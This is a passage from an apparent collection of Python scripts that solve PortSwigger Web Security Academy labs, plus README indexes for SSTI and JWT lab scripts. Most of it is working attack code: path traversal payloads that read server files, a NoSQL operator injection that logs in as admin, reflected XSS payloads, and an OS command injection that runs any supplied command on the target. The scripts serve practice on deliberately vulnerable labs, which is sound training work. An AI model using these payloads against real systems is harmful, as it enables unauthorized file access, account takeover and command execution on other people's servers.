30 | 	print('[+] Server response:\n\n%s' % r.text)
31 | 
32 | 
33 | ##########################################################
34 | #	MAIN
35 | ##########################################################
36 | 
37 | def main():
38 | 	print('[+] Lab: File path traversal, simple case')
39 | 	parser = argparse.ArgumentParser(description="[+] Lab: File path traversal, simple case")
40 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
41 | 	parser.add_argument('-F',dest='file',required=True, help="Target file's path")
42 | 	args = parser.parse_args()
43 | 	file = args.file
44 | 	parsed_url = urllib.parse.urlparse(args.url)
45 | 	host = parsed_url.netloc
46 | 	print(parsed_url)
47 | 	url = parsed_url.scheme + '://' + host
48 | 	s = requests.Session()
49 | 	s.proxies = proxies		# Comment this line to disable proxying
50 | 	s.verify = False
51 | 	try:
52 | 		r = s.get(url, allow_redirects=False)
53 | 		time.sleep(1)
54 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
55 | 			print('\n[-] HOST seems to be down <!>')
56 | 			sys.exit(-1)
57 | 		else:
58 | 			print('[+] Trying send Directory Traversal attack ...\n')
59 | 			time.sleep(1)
60 | 			r = read_file(s, url, file)
61 | 			s.cookies.clear()
62 | 			time.sleep(2)
63 | 			r = s.get(url)
64 | 			if 'Congratulations, you solved the lab!' in r.text:
65 | 				print('[+] The lab is solved !')
66 | 	except requests.exceptions.ProxyError:
67 | 		print('[-] PROXY seems to be missconfigured <!>')
68 | 	except KeyboardInterrupt:
69 | 		sys.exit(0)
70 | 
71 | if __name__ == "__main__":
72 | 	main()
73 | 


--------------------------------------------------------------------------------
/NoSQL/exploit-lab02.py:
--------------------------------------------------------------------------------
 1 | # Exploiting NoSQL operator injection to bypass authentication
 2 | 
 3 | # https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-bypass-authentication
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import string
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def connect_as_admin(s, url):
27 | 	print('\n[+] Trying to log in as Administrator')
28 | 	login_path = url + '/login'
29 | 	login_data = {
30 | 	"username": {"$regex": "admin.*"},
31 | 	"password": {"$ne": ""}
32 | 	}
33 | 	print(f'JSON payload:\n\t{login_data}')
34 | 	r = s.post(login_path, json=login_data)
35 | 
36 | 
37 | ##########################################################
38 | #	MAIN
39 | ##########################################################
40 | 
41 | def main():
42 | 	print('[+] Lab: Exploiting NoSQL operator injection to bypass authentication')
43 | 	parser = argparse.ArgumentParser(description="[+] Lab: Exploiting NoSQL operator injection to bypass authentication")
44 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
45 | 	args = parser.parse_args()
46 | 	parsed_url = urllib.parse.urlparse(args.url)
47 | 	host = parsed_url.netloc
48 | 	print(parsed_url)
49 | 	url = parsed_url.scheme + '://' + host
50 | 	s = requests.Session()
51 | 	s.proxies = proxies		# Comment this line to disable proxying
52 | 	s.verify = False
53 | 	try:
54 | 		r = s.get(url, allow_redirects=False)
55 | 		time.sleep(1)
56 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
57 | 			print('\n[-] HOST seems to be down <!>')
58 | 			sys.exit(-1)
59 | 		else:
60 | 			print("[+] Trying to bypass authentication...\n")
61 | 			time.sleep(1)
62 | 
63 | 			connect_as_admin(s, url)
64 | 
65 | 			s.cookies.clear()
66 | 			s.headers.clear()
67 | 			time.sleep(2)
68 | 			r = s.get(url)
69 | 			if 'Congratulations, you solved the lab!' in r.text:
70 | 				print('\n[+] The lab is solved !')
71 | 	except requests.exceptions.ProxyError:
72 | 		print('[-] PROXY seems to be missconfigured <!>')
73 | 	except KeyboardInterrupt:
74 | 		sys.exit(0)
75 | 
76 | if __name__ == "__main__":
77 | 	main()
78 | 
79 | 


--------------------------------------------------------------------------------
/SSTI/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## SSTI
 3 | 
 4 | 
 5 | 
 6 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSTI/exploit-lab01.py)
 7 | 
 8 | Lab: [Basic server-side template injection](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic)
 9 | 
10 | Difficulty: PRACTITIONER
11 | 
12 | 
13 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSTI/exploit-lab02.py)
14 | 
15 | Lab: [Basic server-side template injection (code context)](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic-code-context)
16 | 
17 | Difficulty: PRACTITIONER
18 | 
19 | 
20 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSTI/exploit-lab03.py)
21 | 
22 | Lab: [Server-side template injection using documentation](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-using-documentation)
23 | 
24 | Difficulty: PRACTITIONER
25 | 
26 | 
27 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSTI/exploit-lab04.py)
28 | 
29 | Lab: [Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
30 | 
31 | Difficulty: PRACTITIONER
32 | 
33 | 
34 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSTI/exploit-lab05.py)
35 | 
36 | Lab: [Server-side template injection with information disclosure via user-supplied objects](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-with-information-disclosure-via-user-supplied-objects)
37 | 
38 | Difficulty: PRACTITIONER
39 | 
40 | 
41 | ### [**Script 06**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSTI/exploit-lab06.py)
42 | 
43 | Lab: [Server-side template injection in a sandboxed environment](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-a-sandboxed-environment)
44 | 
45 | Difficulty: EXPERT
46 | 
47 | 
48 | ### [**Script 07**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/SSTI/exploit-lab07.py)
49 | 
50 | Lab: [Server-side template injection with a custom exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-with-a-custom-exploit)
51 | 
52 | Difficulty: EXPERT
53 | 
54 | 


--------------------------------------------------------------------------------
/DirectoryTraversal/exploit-lab05.py:
--------------------------------------------------------------------------------
 1 | # File path traversal, validation of start of path
 2 | 
 3 | # https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def read_file(s, url, file):
26 | 	file_path = url + '/image?filename=/var/www/images/../../../..'
27 | 	print('[+] Trying to read %s on the target server...' % file)
28 | 	print('\n[+] Sending GET request to "%s"' % (file_path + file))
29 | 	r = s.get(file_path + file)
30 | 	print('[+] Server response:\n\n%s' % r.text)
31 | 
32 | 
33 | ##########################################################
34 | #	MAIN
35 | ##########################################################
36 | 
37 | def main():
38 | 	print('[+] Lab: File path traversal, validation of start of path')
39 | 	parser = argparse.ArgumentParser(description="[+] Lab: File path traversal, validation of start of path")
40 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
41 | 	parser.add_argument('-F',dest='file',required=True, help="Target file's path")
42 | 	args = parser.parse_args()
43 | 	file = args.file
44 | 	parsed_url = urllib.parse.urlparse(args.url)
45 | 	host = parsed_url.netloc
46 | 	print(parsed_url)
47 | 	url = parsed_url.scheme + '://' + host
48 | 	s = requests.Session()
49 | 	s.proxies = proxies		# Comment this line to disable proxying
50 | 	s.verify = False
51 | 	try:
52 | 		r = s.get(url, allow_redirects=False)
53 | 		time.sleep(1)
54 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
55 | 			print('\n[-] HOST seems to be down <!>')
56 | 			sys.exit(-1)
57 | 		else:
58 | 			print('[+] Trying send Directory Traversal attack ...\n')
59 | 			time.sleep(1)
60 | 			r = read_file(s, url, file)
61 | 			s.cookies.clear()
62 | 			time.sleep(2)
63 | 			r = s.get(url)
64 | 			if 'Congratulations, you solved the lab!' in r.text:
65 | 				print('[+] The lab is solved !')
66 | 	except requests.exceptions.ProxyError:
67 | 		print('[-] PROXY seems to be missconfigured <!>')
68 | 	except KeyboardInterrupt:
69 | 		sys.exit(0)
70 | 
71 | if __name__ == "__main__":
72 | 	main()
73 | 


--------------------------------------------------------------------------------
/JWT/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## JWT
 3 | 
 4 | 
 5 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/JWT/exploit-lab01.py)
 6 | 
 7 | Lab: [JWT authentication bypass via unverified signature](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature)
 8 | 
 9 | Difficulty: APPRENTICE
10 | 
11 | 
12 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/JWT/exploit-lab02.py)
13 | 
14 | Lab: [JWT authentication bypass via flawed signature verification](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification)
15 | 
16 | Difficulty: APPRENTICE
17 | 
18 | 
19 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/JWT/exploit-lab03.py)
20 | 
21 | Lab: [JWT authentication bypass via weak signing key](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key)
22 | 
23 | Difficulty: PRACTITIONER
24 | 
25 | 
26 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/JWT/exploit-lab04.py)
27 | 
28 | Lab: [JWT authentication bypass via jwk header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection)
29 | 
30 | Difficulty: PRACTITIONER
31 | 
32 | 
33 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/JWT/exploit-lab05.py)
34 | 
35 | Lab: [JWT authentication bypass via jku header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection)
36 | 
37 | Difficulty: PRACTITIONER
38 | 
39 | 
40 | ### [**Script 06**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/JWT/exploit-lab06.py)
41 | 
42 | Lab: [JWT authentication bypass via kid header path traversal](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal)
43 | 
44 | Difficulty: PRACTITIONER
45 | 
46 | 
47 | ### [**Script 07**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/JWT/exploit-lab07.py)
48 | 
49 | Lab: [JWT authentication bypass via algorithm confusion](https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion)
50 | 
51 | Difficulty: EXPERT
52 | 
53 | 
54 | ### [**Script 08**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/JWT/exploit-lab08.py)
55 | 
56 | Lab: [JWT authentication bypass via algorithm confusion with no exposed key](https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion-with-no-exposed-key)
57 | 
58 | Difficulty: EXPERT
59 | 
60 | 
61 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS into HTML context with nothing encoded
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_payload(s, url, payload):
26 | 	injection_uri = url + payload
27 | 	r = s.get(injection_uri)
28 | 	time.sleep(1)
29 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
30 | 	print('[+] Using payload:\t%s' % payload)
31 | 	return r
32 | 
33 | def send_xss(s, url):
34 | 	search_path = url + '/?search='
35 | 	xss_payload = "<img src=x onerror=alert(1) />"
36 | 	r = send_payload(s, search_path, xss_payload)
37 | 
38 | 
39 | ##########################################################
40 | #	MAIN
41 | ##########################################################
42 | 
43 | def main():
44 | 	print('[+] Lab: Reflected XSS into HTML context with nothing encoded')
45 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS into HTML context with nothing encoded")
46 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
47 | 	args = parser.parse_args()
48 | 	parsed_url = urllib.parse.urlparse(args.url)
49 | 	host = parsed_url.netloc
50 | 	print(parsed_url)
51 | 	url = parsed_url.scheme + '://' + host
52 | 	s = requests.Session()
53 | 	s.proxies = proxies		# Comment this line to disable proxying
54 | 	s.verify = False
55 | 	try:
56 | 		r = s.get(url, allow_redirects=False)
57 | 		time.sleep(1)
58 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
59 | 			print('\n[-] HOST seems to be down <!>')
60 | 			sys.exit(-1)
61 | 		else:
62 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
63 | 			send_xss(s, url)
64 | 		s.cookies.clear()
65 | 		s.headers.clear()
66 | 		time.sleep(3)
67 | 		r = s.get(url)
68 | 		if 'Congratulations, you solved the lab!' in r.text:
69 | 			print('\n[+] The lab is solved !')
70 | 	except requests.exceptions.ProxyError:
71 | 		print('[-] PROXY seems to be missconfigured <!>')
72 | 	except KeyboardInterrupt:
73 | 		sys.exit(0)
74 | if __name__ == "__main__":
75 | 	main()
76 | 


--------------------------------------------------------------------------------
/DirectoryTraversal/exploit-lab03.py:
--------------------------------------------------------------------------------
 1 | # File path traversal, traversal sequences stripped non-recursively
 2 | 
 3 | # https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def read_file(s, url, file):
26 | 	file_path = url + '/image?filename=....//....//..../'
27 | 	print('[+] Trying to read %s on the target server...' % file)
28 | 	print('\n[+] Sending GET request to "%s"' % (file_path + file))
29 | 	r = s.get(file_path + file)
30 | 	print('[+] Server response:\n\n%s' % r.text)
31 | 
32 | 
33 | ##########################################################
34 | #	MAIN
35 | ##########################################################
36 | 
37 | def main():
38 | 	print('[+] Lab: File path traversal, traversal sequences stripped non-recursively')
39 | 	parser = argparse.ArgumentParser(description="[+] Lab: File path traversal, traversal sequences stripped non-recursively")
40 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
41 | 	parser.add_argument('-F',dest='file',required=True, help="Target file's path")
42 | 	args = parser.parse_args()
43 | 	file = args.file
44 | 	parsed_url = urllib.parse.urlparse(args.url)
45 | 	host = parsed_url.netloc
46 | 	print(parsed_url)
47 | 	url = parsed_url.scheme + '://' + host
48 | 	s = requests.Session()
49 | 	s.proxies = proxies		# Comment this line to disable proxying
50 | 	s.verify = False
51 | 	try:
52 | 		r = s.get(url, allow_redirects=False)
53 | 		time.sleep(1)
54 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
55 | 			print('\n[-] HOST seems to be down <!>')
56 | 			sys.exit(-1)
57 | 		else:
58 | 			print('[+] Trying send Directory Traversal attack ...\n')
59 | 			time.sleep(1)
60 | 			r = read_file(s, url, file)
61 | 			s.cookies.clear()
62 | 			time.sleep(2)
63 | 			r = s.get(url)
64 | 			if 'Congratulations, you solved the lab!' in r.text:
65 | 				print('[+] The lab is solved !')
66 | 	except requests.exceptions.ProxyError:
67 | 		print('[-] PROXY seems to be missconfigured <!>')
68 | 	except KeyboardInterrupt:
69 | 		sys.exit(0)
70 | 
71 | if __name__ == "__main__":
72 | 	main()
73 | 


--------------------------------------------------------------------------------
/DirectoryTraversal/exploit-lab02.py:
--------------------------------------------------------------------------------
 1 | # File path traversal, traversal sequences blocked with absolute path bypass
 2 | 
 3 | # https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def read_file(s, url, file):
26 | 	file_path = url + '/image?filename='
27 | 	file = urllib.parse.quote_plus(file)
28 | 	print('\n[+] Trying to read %s on the target server...' % file)
29 | 	print('\n[+] Sending GET request to "%s"' % (file_path + file))
30 | 	r = s.get(file_path + file)
31 | 	print('[+] Server response:\n\n%s' % r.text)
32 | 
33 | 
34 | ##########################################################
35 | #	MAIN
36 | ##########################################################
37 | 
38 | def main():
39 | 	print('[+] Lab: File path traversal, traversal sequences blocked with absolute path bypass')
40 | 	parser = argparse.ArgumentParser(description="[+] Lab: File path traversal, traversal sequences blocked with absolute path bypass")
41 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
42 | 	parser.add_argument('-F',dest='file',required=True, help="Target file's path")
43 | 	args = parser.parse_args()
44 | 	file = args.file
45 | 	parsed_url = urllib.parse.urlparse(args.url)
46 | 	host = parsed_url.netloc
47 | 	print(parsed_url)
48 | 	url = parsed_url.scheme + '://' + host
49 | 	s = requests.Session()
50 | 	s.proxies = proxies		# Comment this line to disable proxying
51 | 	s.verify = False
52 | 	try:
53 | 		r = s.get(url, allow_redirects=False)
54 | 		time.sleep(1)
55 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
56 | 			print('\n[-] HOST seems to be down <!>')
57 | 			sys.exit(-1)
58 | 		else:
59 | 			print('[+] Trying send Directory Traversal attack ...\n')
60 | 			time.sleep(1)
61 | 			r = read_file(s, url, file)
62 | 			s.cookies.clear()
63 | 			time.sleep(2)
64 | 			r = s.get(url)
65 | 			if 'Congratulations, you solved the lab!' in r.text:
66 | 				print('[+] The lab is solved !')
67 | 	except requests.exceptions.ProxyError:
68 | 		print('[-] PROXY seems to be missconfigured <!>')
69 | 	except KeyboardInterrupt:
70 | 		sys.exit(0)
71 | 
72 | if __name__ == "__main__":
73 | 	main()
74 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab17.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS in canonical link tag
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/contexts/lab-canonical-link-tag
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?'
36 | 	xss_payload = """'accessKey='X'onclick='alert(1)"""
37 | 	r = send_payload(s, search_path, xss_payload.replace("'", "%27"))
38 | 	return r
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: Reflected XSS in canonical link tag')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS in canonical link tag")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
65 | 			r = send_xss(s, url)
66 | 			time.sleep(2)
67 | 			if r.status_code == 200 :
68 | 				r = s.get(url)
69 | 				if  'Congratulations, you solved the lab!' in r.text:
70 | 					print('[+] The lab is solved')
71 | 				else:
72 | 					print('[+] The Exploit sent the given payload !')
73 | 	except requests.exceptions.ProxyError:
74 | 		print('[-] PROXY seems to be missconfigured <!>')
75 | 	except KeyboardInterrupt:
76 | 		sys.exit(0)
77 | 
78 | if __name__ == "__main__":
79 | 	main()
80 | 


--------------------------------------------------------------------------------
/OSCommandInjection/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # OS command injection, simple case
 2 | 
 3 | # https://portswigger.net/web-security/os-command-injection/lab-simple
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def run_cmd(url, cmd):
26 | 	check_stock_path = '/product/stock'
27 | 	params = {'productId': '1 & ' + cmd + ' #', 'storeId': '1' }
28 | 	print("[+] Trying to run command '%s' on the target website..." % cmd)
29 | 	print(f"[+] Sending post request on {check_stock_path}:\n\t{params}\n")
30 | 	r = requests.post(url + check_stock_path, data=params, verify=False, proxies=proxies)
31 | 	time.sleep(1)
32 | 	if r.status_code == 200 and len(r.text) > 3:
33 | 		print("[+] %s\'s response:" % url)
34 | 		print(r.text)
35 | 	else:
36 | 		print("[-] Command Injection Failed !!!")
37 | 
38 | 
39 | ##########################################################
40 | #	MAIN
41 | ##########################################################
42 | 
43 | def main():
44 | 	print('[+] Lab: OS command injection, simple case')
45 | 	parser = argparse.ArgumentParser(description="[+] Lab: OS command injection, simple case")
46 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
47 | 	parser.add_argument('-C',dest='cmd',required=True, help="Command")
48 | 	args = parser.parse_args()
49 | 	parsed_url = urllib.parse.urlparse(args.url)
50 | 	host = parsed_url.netloc
51 | 	print(parsed_url)
52 | 	url = parsed_url.scheme + '://' + host
53 | 	cmd = args.cmd
54 | 	s = requests.Session()
55 | 	s.proxies = proxies
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send OS Command Injection ...\n')
65 | 			time.sleep(1)
66 | 			run_cmd(url, cmd)
67 | 			time.sleep(2)
68 | 			r = s.get(url)
69 | 			print(r)
70 | 			if 'Congratulations, you solved the lab!' in r.text:
71 | 				print('[+] The lab is solved !')
72 | 	except requests.exceptions.ProxyError:
73 | 		print('[-] PROXY seems to be missconfigured <!>')
74 | 	except KeyboardInterrupt:
75 | 		sys.exit(0)
76 | 
77 | if __name__ == "__main__":
78 | 	main()
79 | 


--------------------------------------------------------------------------------
/DirectoryTraversal/exploit-lab06.py:
--------------------------------------------------------------------------------
 1 | # File path traversal, validation of file extension with null byte bypass
 2 | 
 3 | # https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def read_file(s, url, file):
26 | 	file_path = url + '/image?filename=../../..'
27 | 	suffix = '%00.png'
28 | 	payload = file + suffix
29 | 	print('[+] Trying to read %s on the target server...' % payload)
30 | 	print('\n[+] Sending GET request to "%s"' % (file_path + payload))
31 | 	r = s.get(file_path + payload)
32 | 	print('[+] Server response:\n\n%s' % r.text)
33 | 
34 | 
35 | ##########################################################
36 | #	MAIN
37 | ##########################################################
38 | 
39 | def main():
40 | 	print('[+] Lab: File path traversal, validation of file extension with null byte bypass')
41 | 	parser = argparse.ArgumentParser(description="[+] Lab: File path traversal, validation of file extension with null byte bypass")
42 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
43 | 	parser.add_argument('-F',dest='file',required=True, help="Target file's path")
44 | 	args = parser.parse_args()
45 | 	file = args.file
46 | 	parsed_url = urllib.parse.urlparse(args.url)
47 | 	host = parsed_url.netloc
48 | 	print(parsed_url)
49 | 	url = parsed_url.scheme + '://' + host
50 | 	s = requests.Session()
51 | 	s.proxies = proxies		# Comment this line to disable proxying
52 | 	s.verify = False
53 | 	try:
54 | 		r = s.get(url, allow_redirects=False)
55 | 		time.sleep(1)
56 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
57 | 			print('\n[-] HOST seems to be down <!>')
58 | 			sys.exit(-1)
59 | 		else:
60 | 			print('[+] Trying send Directory Traversal attack ...\n')
61 | 			time.sleep(1)
62 | 			r = read_file(s, url, file)
63 | 			s.cookies.clear()
64 | 			time.sleep(2)
65 | 			r = s.get(url)
66 | 			if 'Congratulations, you solved the lab!' in r.text:
67 | 				print('[+] The lab is solved !')
68 | 	except requests.exceptions.ProxyError:
69 | 		print('[-] PROXY seems to be missconfigured <!>')
70 | 	except KeyboardInterrupt:
71 | 		sys.exit(0)
72 | 
73 | if __name__ == "__main__":
74 | 	main()
75 | 


--------------------------------------------------------------------------------
/DirectoryTraversal/exploit-lab04.py:
--------------------------------------------------------------------------------
 1 | # File path traversal, traversal sequences stripped with superfluous URL-decode
 2 | 
 3 | # https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def read_file(s, url, file):
26 | 	file_path = url + '/image?filename='
27 | 	file = urllib.parse.quote_plus(urllib.parse.quote_plus('../../..' + file))
28 | 	print('\n[+] Trying to read %s on the target server...' % file)
29 | 	print('\n[+] Sending GET request to "%s"' % (file_path + file))
30 | 	r = s.get(file_path + file)
31 | 	print('[+] Server response:\n\n%s' % r.text)
32 | 
33 | 
34 | ##########################################################
35 | #	MAIN
36 | ##########################################################
37 | 
38 | def main():
39 | 	print('[+] Lab: File path traversal, traversal sequences stripped with superfluous URL-decode')
40 | 	parser = argparse.ArgumentParser(description="[+] Lab: File path traversal, traversal sequences stripped with superfluous URL-decode")
41 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
42 | 	parser.add_argument('-F',dest='file',required=True, help="Target file's path")
43 | 	args = parser.parse_args()
44 | 	file = args.file
45 | 	parsed_url = urllib.parse.urlparse(args.url)
46 | 	host = parsed_url.netloc
47 | 	print(parsed_url)
48 | 	url = parsed_url.scheme + '://' + host
49 | 	s = requests.Session()
50 | 	s.proxies = proxies		# Comment this line to disable proxying
51 | 	s.verify = False
52 | 	try:
